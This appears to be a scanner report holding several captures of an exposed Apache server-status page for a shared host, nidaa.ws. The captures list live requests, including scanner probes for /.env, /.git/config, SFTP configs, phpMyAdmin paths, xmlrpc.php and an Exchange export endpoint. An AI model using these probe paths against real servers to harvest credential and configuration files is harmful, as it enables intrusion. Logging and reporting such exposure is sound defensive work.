      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Friday, 24-May-2024 13:54:06 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 1
      Parent Server MPM Generation: 0
      Server uptime:  1 day 9 hours 49 minutes 16 seconds
      Server load: 0.29 0.41 0.40
      Total accesses: 195965 - Total Traffic: 28.5 GB - Total Duration: 218053630
      CPU Usage: u82.85 s7.34 cu798.99 cs162.99 - .864% CPU load
      1.61 requests/sec - 245.1 kB/second - 152.3 kB/request - 1112.72 ms/request
      9 requests currently being processed, 0 workers gracefully restarting, 116 idle workers
      KK_______________________KW_______________________K_____________
      ___________.....................................................
      ...................................R...........____________K____
      ______________________K_____KR___...............................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-0178591/1/1061K
      0.021311331960.80.00114.80
      162.158.159.42http/1.1nidaa.ws:80GET /server HTTP/1.1
      
      0-0178591/1/830K
      0.02015034550.90.00176.54
      172.70.114.16http/1.1nidaa.ws:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      0-0178590/0/932_
      0.00246285230.00.0090.70
      172.71.99.70http/1.1qr.brunch.ws:443GET /storage/food_image/17088536517355_imge12175a5596244dd9127e
      
      0-0178590/0/833_
      0.00222672830.00.0087.95
      172.70.46.108http/1.1qr.brunch.ws:443GET /storage/food_image/17096782595842_risottobeef.webp HTTP/1.
      
      0-0178590/0/959_
      0.00247593420.00.00157.40
      172.71.102.85http/1.1qr.brunch.ws:443GET /storage/food_image/17096789003777_struwberry.webp HTTP/1.1
      
      0-0178590/0/763_
      0.00205725160.00.00122.60
      138.201.201.48http/1.1sulaimaniya.edu.sa:443POST /wp-cron.php?doing_wp_cron=1716547999.31032109260559082031
      
      0-0178590/0/978_
      0.00276009180.00.00148.45
      172.71.99.63http/1.1qr.brunch.ws:443GET /storage/food_image/17162869093901_tiramisu.jpg HTTP/1.1
      
      0-0178590/0/873_
      0.00226414470.00.00154.00
      172.71.183.26http/1.1qr.brunch.ws:443GET /storage/food_image/17095826881606_smokesalmomcroissant.jpg
      
      0-0178590/0/1228_
      0.00284783970.00.00160.38
      172.70.47.59http/1.1qr.brunch.ws:443GET /storage/food_image/17095846052706_croissantegg.jpg HTTP/1.
      
      0-0178590/0/914_
      0.00225610140.00.00148.38
      172.71.98.111http/1.1qr.brunch.ws:443GET /storage/food_image/17096782134810_pumkin.webp HTTP/1.1
      
      0-0178590/0/705_
      0.00298210122400.00.00118.71
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-0178590/0/1048_
      0.0021312114890.00.00125.14
      172.71.102.238http/1.1qr.brunch.ws:443GET /storage/category_image/17098166194722_22.png HTTP/1.1
      
      0-0178590/0/874_
      0.00278149610.00.00205.77
      172.70.46.44http/1.1qr.brunch.ws:443GET /storage/vendor_settings/17085246857302_group6395.png HTTP/
      
      0-0178590/0/903_
      0.00262431080.00.00122.74
      172.71.182.170http/1.1qr.brunch.ws:443GET /storage/category_image/17098168135667_14.png HTTP/1.1
      
      0-0178590/0/984_
      0.00297673120.00.0096.85
      172.71.99.187http/1.1qr.brunch.ws:443GET /storage/cover_image/17089563134221_image.jpg HTTP/1.1
      
      0-0178590/0/812_
      0.00243953010.00.00150.02
      172.71.103.53http/1.1qr.brunch.ws:443GET /storage/food_image/17096770987078_minibeefburger.webp HTTP
      
      0-0178590/0/861_
      0.00244993630.00.00165.39
      172.71.103.63http/1.1qr.brunch.ws:443GET /storage/food_image/17088484233758_imgacf71be0991e4e4186ad5
      
      0-0178590/0/949_
      0.00255607720.00.00177.05
      172.71.102.220http/1.1qr.brunch.ws:443GET /storage/food_image/17096759334735_akkawe.webp HTTP/1.1
      
      0-0178590/0/1052_
      0.00217234770.00.00132.43
      172.71.99.229http/1.1qr.brunch.ws:443GET /storage/food_image/17088521884032_img9ad68aa995054d8fbb12e
      
      0-0178590/0/902_
      0.00246417110.00.00107.17
      172.71.94.88http/1.1qr.brunch.ws:443GET /storage/food_image/17088533725513_imgdebdee5a0f8c4a2baf5e0
      
      0-0178590/0/932_
      0.002135614660.00.0089.09
      141.101.76.22http/1.1qr.brunch.ws:443GET /storage/food_image/17088551141700_img60db9211a02345f08b4a9
      
      0-0178590/0/940_
      0.00242411360.00.00138.79
      172.71.102.50http/1.1qr.brunch.ws:443GET /storage/food_image/17096771367772_fajita.webp HTTP/1.1
      
      0-0178590/0/934_
      0.002983014940.00.00136.31
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-0178590/0/839_
      0.002476673990.00.00151.99
      172.71.98.88http/1.1qr.brunch.ws:443GET /storage/food_image/17096750977521_granola.webp HTTP/1.1
      
      0-0178590/0/1024_
      0.0021015155320.00.00124.23
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      1-0178871/1/838K
      0.020319510780.80.00156.13
      172.70.114.107http/1.1nidaa.ws:80GET /about HTTP/1.1
      
      1-0178870/0/961W
      0.00004965040.00.00174.68
      162.158.155.29http/1.1nidaa.ws:80GET /server-status HTTP/1.1
      
      1-0178870/0/889_
      0.001354972280.00.00171.20
      172.71.102.171http/1.1qr.brunch.ws:443GET /storage/category_image/17098164893955_4.png HTTP/1.1
      
      1-0178870/0/920_
      0.00128750790.00.00139.27
      172.70.46.111http/1.1qr.brunch.ws:443GET /storage/food_image/17096783615789_beef.webp HTTP/1.1
      
      1-0178870/0/855_
      0.001773293230.00.00149.92
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      1-0178870/0/768_
      0.00146398220.00.00129.51
      172.70.47.10http/1.1qr.brunch.ws:443GET /storage/food_image/17096788308104_apple.webp HTTP/1.1
      
      1-0178870/0/848_
      0.00124038660.00.00124.57
      141.101.76.1
      Found on 2024-05-24 10:54
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df753369b36

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Friday, 24-May-2024 03:11:44 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 1
      Parent Server MPM Generation: 0
      Server uptime:  23 hours 6 minutes 54 seconds
      Server load: 0.59 0.41 0.38
      Total accesses: 148652 - Total Traffic: 22.1 GB - Total Duration: 130098388
      CPU Usage: u62.24 s7.16 cu611.2 cs123.76 - .967% CPU load
      1.79 requests/sec - 278.8 kB/second - 156.1 kB/request - 875.188 ms/request
      33 requests currently being processed, 0 workers gracefully restarting, 92 idle workers
      _K__K___KK_______RK___KK_K_R_KK_C______________KKKK__K_K_KK___K_
      __________RKKKKK_KK___W________K____W________________________...
      ................................................................
      .................W..............................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-0223091/10/884K
      2.04019945880.80.6786.12
      172.70.114.108http/1.1nidaa.ws:80GET /.env HTTP/1.1
      
      0-0223091/8/557K
      2.03112684970.854.87137.00
      162.158.62.165http/1.1nidaa.ws:80GET /debug/default/view?panel=config HTTP/1.1
      
      0-0223090/9/685_
      1.8776138775868910.00.2268.75
      185.133.181.27http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/7XbzcqLjpmlOOYOfIRlrXv
      
      0-0223090/7/636_
      1.8865221398480.00.1764.69
      185.133.181.27http/1.1jawad.com.sa:443GET / HTTP/1.1
      
      0-0223091/9/612K
      2.03004139360.811.29115.55
      172.70.110.158http/1.1nidaa.ws:80GET /.DS_Store HTTP/1.1
      
      0-0223090/14/571_
      1.973334678050.014.8580.80
      185.133.181.27http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/6kr44KLGo1RB7ZVTLvQNPf
      
      0-0223090/7/792_
      1.877434860080.00.1052.98
      138.201.201.48http/1.1zed.sa:443POST /wp-cron.php?doing_wp_cron=1716509430.07140398025512695312
      
      0-0223090/19/653_
      1.9731105404520.00.46101.45
      23.22.35.162http/1.1albayan.edu.sa:443GET /albayan_library/Books.php?sec=940 HTTP/1.1
      
      0-0223091/8/920K
      2.03013594160.80.05128.89
      172.70.80.208http/1.1nidaa.ws:80GET /v2/_catalog HTTP/1.1
      
      0-0223091/5/643K
      2.022226986866.60.11122.41
      172.69.214.9http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-0223090/8/460_
      1.87773308209256000.00.2597.15
      185.133.181.27http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/2ItjUr1EFSfFWaFbZtbfvE
      
      0-0223090/10/718_
      1.973317099887490.09.8397.02
      185.133.181.27http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/4ZxKmr7Lnx6PaOYBwrlqP3
      
      0-0223090/10/693_
      1.906211754223260.00.42106.98
      185.133.181.27http/1.1jawad.com.sa:443GET /jawad_catalog.pdf HTTP/1.1
      
      0-0223090/72/737_
      1.96336321720860.012.29107.39
      185.133.181.27http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/PcmWGNYTNoLW6FibbP5Le9
      
      0-0223090/59/802_
      1.982025496250.00.0874.87
      185.133.181.27http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.ttf?v=4.7
      
      0-0223090/7/555_
      1.915602703980.00.04108.73
      54.36.148.242http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=5&q=254&t=54.36.148.70&c=5 HTTP/
      
      0-0223090/22/659_
      2.01271483583550.011.00138.32
      185.133.181.27http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/x4j8JXmTFqBFr2PBBlOxZX
      
      0-0223090/9/676R
      1.7716604117660.012.08135.17
      185.133.181.27http/1.1
      
      0-0223091/44/789K
      2.03115685950.90.08108.03
      162.158.62.126http/1.1nidaa.ws:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      0-0223090/8/538_
      2.011213114180.00.4141.17
      199.45.155.33http/1.13dvi.com:443GET / HTTP/1.1
      
      0-0223090/31/653_
      1.963333679090.01.6875.06
      185.133.181.27http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/t999xk0bWcuyE5IoWKxc5e
      
      0-0223090/8/691_
      2.02221512670.00.11101.56
      162.158.159.93http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-0223091/7/668K
      2.02211174310.88.9688.98
      162.158.154.52http/1.1nidaa.ws:80GET /server HTTP/1.1
      
      0-0223091/8/608K
      2.03112294380.89.6199.58
      172.70.230.42http/1.1nidaa.ws:80GET /about HTTP/1.1
      
      0-0223090/8/734_
      2.02732210780.08.5376.18
      52.70.240.171http/1.1albayan.edu.sa:443GET /albayan_library/BooksVi.php?b=1585 HTTP/1.1
      
      1-0222042/10/625K
      1.750118571671.70.06141.33
      108.162.242.99http/1.1nidaa.ws:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      1-0222040/7/633_
      1.5782461686750.06.83130.77
      185.133.181.27http/1.1jawad.com.sa:443POST /api/v.1/front/new/product?page=0 HTTP/1.1
      
      1-0222041/15/678C
      1.750141829613.00.45118.57
      52.70.240.171http/1.1albayan.edu.sa:443GET /albayan_library/BooksVi.php?b=1584 HTTP/1.1
      
      1-0222040/7/693_
      1.588027840650.00.14123.14
      185.133.181.27http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.woff2?v=4
      
      1-0222041/9/689K
      1.74011383050.80.1181.46
      162.158.159.39http/1.1nidaa.ws:80GET /login.action HTTP/1.1
      
      1-0222042/10/590K
      1.74115600721.70.16114.46
      162.158.154.251http/1.1nidaa.ws:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      1-0222040/20/661_
      1.635173943405550.03.5779.01
      185.133.181.27http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/wkF0NxOfDQYLn1pNQm2Myh
      
      1-0222041/8/689C
      1.73513692990.8
      Found on 2024-05-24 00:11
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df76c1e8cbb

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Thursday, 23-May-2024 17:23:20 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 1
      Parent Server MPM Generation: 0
      Server uptime:  13 hours 18 minutes 30 seconds
      Server load: 0.44 0.39 0.40
      Total accesses: 89136 - Total Traffic: 9.9 GB - Total Duration: 49984880
      CPU Usage: u184.98 s29.51 cu208.54 cs39.23 - .965% CPU load
      1.86 requests/sec - 215.9 kB/second - 116.1 kB/request - 560.771 ms/request
      19 requests currently being processed, 0 workers gracefully restarting, 231 idle workers
      ____K_______________K_______K________________K__________________
      _______K____C_____K________W__________R____K__________________K_
      _______________________K____________W_____W_______________K_____
      _______________________________KK__________K______K_______......
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-0295290/513/513_
      46.9622622021310.053.2253.22
      176.224.99.150http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/themes/default/img/shad_tile.png HTTP
      
      0-0295290/333/333_
      47.0415211100310.058.6158.61
      220.126.251.164http/1.1akg.sa:443GET /phpmyadmin2018/index.php?lang=en HTTP/1.1
      
      0-0295290/450/450_
      47.0282503255390.051.2751.27
      52.167.144.194http/1.1jawad.com.sa:443GET /en HTTP/1.1
      
      0-0295290/346/346_
      47.0612716830.020.3220.32
      172.70.114.254http/1.1nidaa.ws:80GET /.git/config HTTP/1.1
      
      0-0295291/371/371K
      47.07103188610.647.4947.49
      220.126.251.164http/1.1akg.sa:80GET /mysql/pMA/index.php?lang=en HTTP/1.1
      
      0-0295290/315/315_
      46.9225013745120.027.1627.16
      204.101.161.19http/1.1zed.sa:80GET /wp-content/themes/gastrobar/assets/js/modules/plugins/jque
      
      0-0295290/482/482_
      47.065211942880.023.0723.07
      220.126.251.164http/1.1akg.sa:443GET /sqlmanager/index.php?lang=en HTTP/1.1
      
      0-0295290/315/315_
      46.8072648834240.040.4240.42
      220.126.251.164http/1.1
      
      0-0295290/477/477_
      47.00135792696320.055.3255.32
      172.70.203.130http/1.1qr.brunch.ws:443POST /foods/11 HTTP/1.1
      
      0-0295290/342/342_
      46.621461331715220.055.3055.30
      176.224.99.150http/1.1
      
      0-0295290/269/269_
      46.962307680764820.039.6639.66
      216.244.66.198http/1.1albayan.edu.sa:443GET /imgweb/file43/%D8%A7%D9%84%D8%B9%D8%B4%D8%B1%D8%A9%20%D8%A
      
      0-0295290/465/465_
      47.057218390760.030.6030.60
      172.70.203.146http/1.1qr.brunch.ws:443GET /public/assets/fonts/rb.ttf HTTP/1.1
      
      0-0295290/407/407_
      47.07233584830.031.3831.38
      220.126.251.164http/1.1akg.sa:443GET /db/phpmyadmin3/index.php?lang=en HTTP/1.1
      
      0-0295290/377/377_
      47.02500921730.033.9033.90
      220.126.251.164http/1.1akg.sa:80GET /MyAdmin/index.php?lang=en HTTP/1.1
      
      0-0295290/472/472_
      46.95234682843910.042.8242.82
      172.70.203.152http/1.1qr.brunch.ws:443GET / HTTP/1.1
      
      0-0295290/299/299_
      47.0337201804930.021.7421.74
      220.126.251.164http/1.1akg.sa:443GET /phpMyAdmin-5.2.0-all-languages/index.php?lang=en HTTP/1.1
      
      0-0295290/365/365_
      46.9224812068880.048.3648.36
      204.101.161.19http/1.1zed.sa:80GET /wp-content/plugins/mpc-massive/assets/js/mpc-vendor.min.js
      
      0-0295290/395/395_
      46.9818712866640.059.2559.25
      2.90.128.26http/1.1albayan.edu.sa:443GET /web/images/title.jpg HTTP/1.1
      
      0-0295290/418/418_
      47.032929402650.054.3854.38
      220.126.251.164http/1.1akg.sa:443GET /db/phpmyadmin/index.php?lang=en HTTP/1.1
      
      0-0295290/320/320_
      47.0621279710.015.5615.56
      172.70.111.108http/1.1nidaa.ws:80GET /server HTTP/1.1
      
      0-0295291/371/371K
      47.07312189920.838.4638.46
      172.70.206.186http/1.1nidaa.ws:80GET /.vscode/sftp.json HTTP/1.1
      
      0-0295290/358/358_
      46.991583927900.031.1231.12
      95.219.197.141http/1.1albayan.edu.sa:443GET /e_sch/font/css/bootstrap.min.css HTTP/1.1
      
      0-0295290/415/415_
      47.042129649410.024.8424.84
      220.126.251.164http/1.1akg.sa:443GET /mysql/web/index.php?lang=en HTTP/1.1
      
      0-0295290/382/382_
      46.9225121795410.031.0231.02
      204.101.161.19http/1.1zed.sa:80GET /wp-content/themes/gastrobar/assets/js/modules/plugins/Scro
      
      0-0295290/384/384_
      46.9620401198170.026.4126.41
      54.36.148.135http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=5&q=770&t=54.36.150.85&c=5 HTTP/1
      
      1-0267870/24/427_
      5.51141318091270.03.6990.54
      87.121.69.52http/1.1php.we3dvi.com:80CONNECT google.com:443 HTTP/1.1
      
      1-0267870/44/266_
      5.51546451176190.01.5968.05
      94.16.112.22http/1.1zed.sa:80POST /xmlrpc.php HTTP/1.1
      
      1-0267870/30/411_
      5.5333669050.02.0037.91
      220.126.251.164http/1.1akg.sa:443GET /index.php?lang=en HTTP/1.1
      
      1-0267871/40/410K
      5.54114349120.84.6930.79
      172.71.134.139http/1.1nidaa.ws:80GET /v2/_catalog HTTP/1.1
      
      1-0267870/19/399_
      5.51903409620.00.3625.37
      138.201.201.48http/1.1zed.sa:80POST /wp-cron.php?doing_wp_cron=1716474110.12027788162231445312
      
      1-0267870/36/357_
      5.5292730440.01.5848.68
      172.70.231.69http/1.1nidaa.ws:80GET / HTTP/1.1
      
      1-0267870/84/431_
      5.38425012304750.02.4620.29
      46.251.130.225http/1.1
      
      1-0267870/45/373_
      5.4915832814840.02.7717.55
      95.219.197.141http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      1-0267870/25/324_
      5.281491457620788
      Found on 2024-05-23 14:23
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df714302628

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Thursday, 23-May-2024 05:33:01 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 1
      Parent Server MPM Generation: 0
      Server uptime:  1 hour 28 minutes 11 seconds
      Server load: 0.45 0.27 0.25
      Total accesses: 2631 - Total Traffic: 594.3 MB - Total Duration: 1086047
      CPU Usage: u17.73 s3.29 cu0 cs0 - .397% CPU load
      .497 requests/sec - 115.0 kB/second - 231.3 kB/request - 412.789 ms/request
      39 requests currently being processed, 0 workers gracefully restarting, 161 idle workers
      __K__________K_K_K_K_____________________K__KK_KK__________W____
      KK______K_KK____________KKK__K______K___________KK__KK_______K__
      ________K_____KK_______KKK_K_________K_________KC_K_K_________K_
      ________........................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-0295290/16/16_
      2.28390253793810.012.9412.94
      51.36.232.215http/1.1albayan.edu.sa:443GET /imgweb/file43/G9%20Basic%20Skills%20T3%20WB.pdf HTTP/1.1
      
      0-0295290/18/18_
      2.38229818340.00.630.63
      35.93.79.55http/1.1white-petals.com:443GET /robots.txt HTTP/1.1
      
      0-0295291/10/10K
      2.480215966.80.140.14
      172.70.251.146http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-0295290/13/13_
      2.30331127200.00.210.21
      195.191.219.130http/1.1jawad.com.sa:80GET / HTTP/1.1
      
      0-0295290/15/15_
      2.383022619010.00.260.26
      123.125.109.195http/1.1garndhabi.org:80GET / HTTP/1.1
      
      0-0295290/26/26_
      2.47129984790.04.294.29
      174.138.82.83http/1.1attendance.thenewjeddah.com:443GET / HTTP/1.1
      
      0-0295290/21/21_
      2.48835612840.00.850.85
      5.110.21.53http/1.1alezdhar.com:443GET /videos/Zed-450-1.mp4 HTTP/1.1
      
      0-0295290/11/11_
      2.4153220930.07.407.40
      182.40.104.255http/1.1abu-helal.com:80GET / HTTP/1.1
      
      0-0295290/14/14_
      2.3918965249550.016.0016.00
      5.110.21.53http/1.1alezdhar.com:443GET / HTTP/1.1
      
      0-0295290/17/17_
      2.401804429320.01.041.04
      205.185.116.34http/1.1trynidaa.com:443POST /xmlrpc.php HTTP/1.1
      
      0-0295290/12/12_
      2.099957040.00.590.59
      5.110.21.53http/1.1
      
      0-0295290/10/10_
      2.1213173760.00.100.10
      174.138.82.83http/1.1
      
      0-0295290/10/10_
      2.41159251134690.09.529.52
      5.110.21.53http/1.1alezdhar.com:443GET /images/company-bg.png HTTP/1.1
      
      0-0295291/12/12K
      2.49019540.80.290.29
      172.68.195.224http/1.1nidaa.ws:80GET /about HTTP/1.1
      
      0-0295290/25/25_
      2.4633311660.01.241.24
      176.16.35.255http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-0295291/11/11K
      2.490122240.87.817.81
      162.158.95.182http/1.1nidaa.ws:80GET /.env HTTP/1.1
      
      0-0295290/16/16_
      2.2146613400.00.130.13
      172.105.16.34http/1.1hawsab.me:80GET /.vscode/sftp.json HTTP/1.1
      
      0-0295291/7/7K
      2.4900150060.82.052.05
      172.68.192.178http/1.1nidaa.ws:80GET /login.action HTTP/1.1
      
      0-0295290/9/9_
      2.21470381650.00.140.14
      139.162.210.205http/1.1trynidaa.com:80GET /s/8343e2130323e2130323e2833313/_/;/META-INF/maven/com.atla
      
      0-0295291/10/10K
      2.490116510.81.961.96
      162.158.111.114http/1.1nidaa.ws:80GET /config.json HTTP/1.1
      
      0-0295290/11/11_
      1.97362162218090.09.699.69
      128.14.211.186http/1.1
      
      0-0295290/9/9_
      2.22466118110.00.190.19
      172.105.16.34http/1.1hawsab.me:80GET /.DS_Store HTTP/1.1
      
      0-0295290/33/33_
      2.38301311320.02.942.94
      178.86.107.84http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-0295290/17/17_
      2.234234399940.01.011.01
      142.154.82.60http/1.1albayan.edu.sa:443GET /web/251.html2 HTTP/1.1
      
      0-0295290/10/10_
      2.3034619240.00.110.11
      216.244.66.198http/1.1albayan.edu.sa:443GET /albayan_library/upload/books/______________%20____________
      
      1-0295300/9/9_
      2.473792673492740.06.026.02
      216.244.66.198http/1.1albayan.edu.sa:443GET /albayan_library/upload/books/fbssb06.pdf HTTP/1.1
      
      1-0295300/15/15_
      2.53338297692790.03.643.64
      5.110.21.53http/1.1alezdhar.com:443GET /videos/Zed-450-1.mp4 HTTP/1.1
      
      1-0295300/16/16_
      2.572900272060.021.6121.61
      54.36.148.208http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=1&q=994&t=54.36.150.105&c=5 HTTP/
      
      1-0295300/15/15_
      2.651796126560.01.731.73
      127.0.0.1http/1.1php.we3dvi.com:80GET /whm-server-status HTTP/1.0
      
      1-0295300/23/23_
      2.5822143854060.01.381.38
      66.249.79.204http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%B4%D9%87%D8%A7%D8%AF%D8%A7%D8%AA%20%D8%AA%
      
      1-0295300/11/11_
      2.65159415490.00.180.18
      5.110.21.53http/1.1alezdhar.com:443GET /images/company-4.png HTTP/1.1
      
      1-0295300/22/22_
      2.533344222890.00.920.92
      195.191.219.130http/1.1jawad.com.sa:443GET / HTTP/1.1
      
      1-0295300/25/25_
      2.5730412114690.01.091.09
      178.86.107.84http/1.1albayan.edu.sa:443GET /images/slider/04.jpg HTTP/1.1
      
      1-0295300/12/12_
